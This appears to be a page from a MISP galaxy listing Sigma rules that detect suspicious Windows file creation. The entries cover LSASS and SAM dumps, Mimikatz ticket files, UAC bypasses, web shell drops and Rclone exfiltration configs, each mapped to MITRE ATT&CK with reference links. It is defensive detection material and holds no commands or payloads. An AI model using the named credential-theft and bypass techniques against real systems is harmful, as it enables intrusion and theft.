A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.

The tag is: misp-galaxy:sigma-rules="Suspicious PFX File Creation"

Suspicious PFX File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 9946. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md

https://github.com/OTRF/detection-hackathon-apt29/issues/14

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml

File Creation In Suspicious Directory By Msdt.EXE

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

The tag is: misp-galaxy:sigma-rules="File Creation In Suspicious Directory By Msdt.EXE"

File Creation In Suspicious Directory By Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9947. Table References

Links

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml

Suspicious DotNET CLR Usage Log Artifact

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.

The tag is: misp-galaxy:sigma-rules="Suspicious DotNET CLR Usage Log Artifact"

Suspicious DotNET CLR Usage Log Artifact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9948. Table References

Links

https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008

https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml

https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html

https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

The tag is: misp-galaxy:sigma-rules="Inveigh Execution Artefacts"

Inveigh Execution Artefacts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9949. Table References

Links

https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs

https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml

Suspicious ASPX File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder

The tag is: misp-galaxy:sigma-rules="Suspicious ASPX File Drop by Exchange"

Suspicious ASPX File Drop by Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9951. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml

Adwind RAT / JRAT File Artifact

Detects javaw.exe in AppData folder as used by Adwind / JRAT

The tag is: misp-galaxy:sigma-rules="Adwind RAT / JRAT File Artifact"

Adwind RAT / JRAT File Artifact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9952. Table References

Links

https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf

https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

The tag is: misp-galaxy:sigma-rules="HackTool - Dumpert Process Dumper Default File"

HackTool - Dumpert Process Dumper Default File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9953. Table References

Links

https://github.com/outflanknl/Dumpert

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml

LSASS Process Dump Artefact In CrashDumps Folder

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

The tag is: misp-galaxy:sigma-rules="LSASS Process Dump Artefact In CrashDumps Folder"

LSASS Process Dump Artefact In CrashDumps Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9954. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml

Anydesk Temporary Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Anydesk Temporary Artefact"

Anydesk Temporary Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9955. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml

Process Monitor Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

The tag is: misp-galaxy:sigma-rules="Process Monitor Driver Creation By Non-Sysinternals Binary"

Process Monitor Driver Creation By Non-Sysinternals Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9956. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml

Mimikatz Kirbi File Creation

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

The tag is: misp-galaxy:sigma-rules="Mimikatz Kirbi File Creation"

Mimikatz Kirbi File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

Table 9957. Table References

Links

https://pentestlab.blog/2019/10/21/persistence-security-support-provider/

https://cobalt.io/blog/kerberoast-attack-techniques

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml

PSScriptPolicyTest Creation By Uncommon Process

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.

The tag is: misp-galaxy:sigma-rules="PSScriptPolicyTest Creation By Uncommon Process"

Table 9958. Table References

Links

https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

The tag is: misp-galaxy:sigma-rules="Wmiexec Default Output File"

Wmiexec Default Output File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9959. Table References

Links

https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/

https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml

RemCom Service File Creation

Detects default RemCom service filename which indicates RemCom service installation and execution

The tag is: misp-galaxy:sigma-rules="RemCom Service File Creation"

RemCom Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9960. Table References

Links

https://github.com/kavika13/RemCom/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remcom_service.yml

New Outlook Macro Created

Detects the creation of a macro file for Outlook.

The tag is: misp-galaxy:sigma-rules="New Outlook Macro Created"

New Outlook Macro Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9961. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml

Suspicious Screensaver Binary File Creation

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension

The tag is: misp-galaxy:sigma-rules="Suspicious Screensaver Binary File Creation"

Suspicious Screensaver Binary File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 9962. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml

Potential Startup Shortcut Persistence Via PowerShell.EXE

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"

The tag is: misp-galaxy:sigma-rules="Potential Startup Shortcut Persistence Via PowerShell.EXE"

Potential Startup Shortcut Persistence Via PowerShell.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9963. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder

https://redcanary.com/blog/intelligence-insights-october-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml

Office Macro File Creation From Suspicious Process

Detects the creation of a office macro file from a a suspicious process

The tag is: misp-galaxy:sigma-rules="Office Macro File Creation From Suspicious Process"

Office Macro File Creation From Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9964. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml

Dynamic CSharp Compile Artefact

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

The tag is: misp-galaxy:sigma-rules="Dynamic CSharp Compile Artefact"

Dynamic CSharp Compile Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 9965. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml

Startup Folder File Write

A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.

The tag is: misp-galaxy:sigma-rules="Startup Folder File Write"

Startup Folder File Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9966. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/12

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml

UAC Bypass Using NTFS Reparse Point - File

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using NTFS Reparse Point - File"

UAC Bypass Using NTFS Reparse Point - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9967. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml

NTDS Exfiltration Filename Patterns

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

The tag is: misp-galaxy:sigma-rules="NTDS Exfiltration Filename Patterns"

NTDS Exfiltration Filename Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9968. Table References

Links

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb

https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml

Suspicious Interactive PowerShell as SYSTEM

Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context

The tag is: misp-galaxy:sigma-rules="Suspicious Interactive PowerShell as SYSTEM"

Suspicious Interactive PowerShell as SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9969. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml

UAC Bypass Using IDiagnostic Profile - File

Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IDiagnostic Profile - File"

UAC Bypass Using IDiagnostic Profile - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9970. Table References

Links

https://github.com/Wh04m1001/IDiagnosticProfileUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml

Legitimate Application Dropped Archive

Detects programs on a Windows system that should not write an archive to disk

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Archive"

Legitimate Application Dropped Archive has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9971. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml

Suspicious Desktopimgdownldr Target File

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

The tag is: misp-galaxy:sigma-rules="Suspicious Desktopimgdownldr Target File"

Suspicious Desktopimgdownldr Target File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9972. Table References

Links

https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

https://twitter.com/SBousseaden/status/1278977301745741825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Consent and Comctl32 - File"

UAC Bypass Using Consent and Comctl32 - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9973. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious PowerShell Module File Created"

Table 9974. Table References

Links

Internal Research[Internal Research]

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml

Potential SAM Database Dump

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

The tag is: misp-galaxy:sigma-rules="Potential SAM Database Dump"

Potential SAM Database Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9975. Table References

Links

https://github.com/cube0x0/CVE-2021-36934

https://github.com/HuskyHacks/ShadowSteal

https://www.google.com/search?q=%22reg.exe+save%22+sam

https://github.com/FireFart/hivenightmare

https://github.com/search?q=CVE-2021-36934

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml

PowerShell Script Dropped Via PowerShell.EXE

Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.

The tag is: misp-galaxy:sigma-rules="PowerShell Script Dropped Via PowerShell.EXE"

Table 9976. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml

UAC Bypass Using MSConfig Token Modification - File

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using MSConfig Token Modification - File"

UAC Bypass Using MSConfig Token Modification - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9977. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml

Rclone Config File Creation

Detects Rclone config files being created

The tag is: misp-galaxy:sigma-rules="Rclone Config File Creation"

Rclone Config File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9978. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_config_files.yml

Suspicious Unattend.xml File Access

Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process

The tag is: misp-galaxy:sigma-rules="Suspicious Unattend.xml File Access"

Suspicious Unattend.xml File Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9979. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml

EVTX Created In Uncommon Location

Detects the creation of new files with the ".evtx" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls

The tag is: misp-galaxy:sigma-rules="EVTX Created In Uncommon Location"

EVTX Created In Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9980. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

The tag is: misp-galaxy:sigma-rules="LiveKD Driver Creation"

Table 9981. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml

UAC Bypass Abusing Winsat Path Parsing - File

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - File"

UAC Bypass Abusing Winsat Path Parsing - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9982. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml

Publisher Attachment File Dropped In Suspicious Location

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

The tag is: misp-galaxy:sigma-rules="Publisher Attachment File Dropped In Suspicious Location"

Table 9983. Table References

Links

https://twitter.com/EmericNasi/status/1623224526220804098

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml

UAC Bypass Using IEInstal - File

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IEInstal - File"

UAC Bypass Using IEInstal - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9984. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml

Assembly DLL Creation Via AspNetCompiler

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

The tag is: misp-galaxy:sigma-rules="Assembly DLL Creation Via AspNetCompiler"

Table 9985. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml

PsExec Service File Creation

Detects default PsExec service filename which indicates PsExec service installation and execution

The tag is: misp-galaxy:sigma-rules="PsExec Service File Creation"

PsExec Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9986. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential Initial Access via DLL Search Order Hijacking"

Potential Initial Access via DLL Search Order Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 9987. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc

https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml

Suspicious Creation with Colorcpl

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

The tag is: misp-galaxy:sigma-rules="Suspicious Creation with Colorcpl"

Suspicious Creation with Colorcpl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 9988. Table References

Links

https://twitter.com/eral4m/status/1480468728324231172?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml

File With Uncommon Extension Created By An Office Application

Detects the creation of files with an executable or script extension by an Office application.

The tag is: misp-galaxy:sigma-rules="File With Uncommon Extension Created By An Office Application"

File With Uncommon Extension Created By An Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9989. Table References

Links

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi(aka_REvil)_Ransomware.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml

Hijack Legit RDP Session to Move Laterally

Detects the usage of tsclient share to place a backdoor on the RDP source machine’s startup folder

The tag is: misp-galaxy:sigma-rules="Hijack Legit RDP Session to Move Laterally"

Hijack Legit RDP Session to Move Laterally has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9990. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml

Suspicious File Creation Activity From Fake Recycle.Bin Folder

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

The tag is: misp-galaxy:sigma-rules="Suspicious File Creation Activity From Fake Recycle.Bin Folder"

Table 9991. Table References

Links

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml

LSASS Process Memory Dump Creation Via Taskmgr.EXE

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

